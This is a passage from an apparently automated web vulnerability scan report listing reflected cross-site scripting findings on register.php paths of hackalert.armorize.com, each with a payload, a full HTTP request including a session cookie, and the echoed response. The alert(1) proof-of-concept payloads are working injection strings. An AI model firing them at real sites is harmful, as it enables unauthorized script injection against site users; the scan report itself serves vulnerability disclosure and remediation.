Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:17:44 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/rc_lang_en.js249f6;alert(1)//3e8150a178d?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.94. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 920fd%3balert(1)//d0c17cd4bb1 was submitted in the REST URL parameter 2. This input was echoed as 920fd;alert(1)//d0c17cd4bb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C920fd%3balert(1)//d0c17cd4bb1/_js/register.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:22 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<920fd;alert(1)//d0c17cd4bb1/_js/register.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.95. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab01d"><script>alert(1)</script>969ff5339f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/ab01d"><script>alert(1)</script>969ff5339f3/_js/register.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:58:45 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/ab01d"><script>alert(1)</script>969ff5339f3/_js/register.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.96. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b97"-alert(1)-"dc963dafe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C20b97"-alert(1)-"dc963dafe8/_js/register.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:59:44 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<20b97"-alert(1)-"dc963dafe8/_js/register.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.97. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b26a0%3balert(1)//1733eab8f53 was submitted in the REST URL parameter 3. This input was echoed as b26a0;alert(1)//1733eab8f53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsb26a0%3balert(1)//1733eab8f53/register.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:12:28 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsb26a0;alert(1)//1733eab8f53/register.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.98. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bbe7"-alert(1)-"470bc104df8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js9bbe7"-alert(1)-"470bc104df8/register.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:06:23 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js9bbe7"-alert(1)-"470bc104df8/register.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.99. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15e3c%3balert(1)//4e3caf563e2 was submitted in the REST URL parameter 4. This input was echoed as 15e3c;alert(1)//4e3caf563e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js15e3c%3balert(1)//4e3caf563e2 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:19:41 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/register.js15e3c;alert(1)//4e3caf563e2?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.100. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26fbf"-alert(1)-"1ad15f73caf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js26fbf"-alert(1)-"1ad15f73caf HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:26 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/register.js26fbf"-alert(1)-"1ad15f73caf?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.101. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97b0c%3balert(1)//cb3658c039d was submitted in the REST URL parameter 2. This input was echoed as 97b0c;alert(1)//cb3658c039d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C97b0c%3balert(1)//cb3658c039d/_js/rich_calendar.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:35 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<97b0c;alert(1)//cb3658c039d/_js/rich_calendar.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.102. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4ac"-alert(1)-"4fca0daf21e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cfa4ac"-alert(1)-"4fca0daf21e/_js/rich_calendar.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:22 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<fa4ac"-alert(1)-"4fca0daf21e/_js/rich_calendar.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.103. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 439b6"><script>alert(1)</script>261e57805f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/439b6"><script>alert(1)</script>261e57805f1/_js/rich_calendar.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:58:53 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/439b6"><script>alert(1)</script>261e57805f1/_js/rich_calendar.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.104. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed262"-alert(1)-"13226647afa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsed262"-alert(1)-"13226647afa/rich_calendar.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:07:15 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsed262"-alert(1)-"13226647afa/rich_calendar.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.105. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a33e2%3balert(1)//6439e6af149 was submitted in the REST URL parameter 3. This input was echoed as a33e2;alert(1)//6439e6af149 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsa33e2%3balert(1)//6439e6af149/rich_calendar.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:40 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsa33e2;alert(1)//6439e6af149/rich_calendar.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.106. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ea68"-alert(1)-"f90fe1cffa7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js2ea68"-alert(1)-"f90fe1cffa7 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
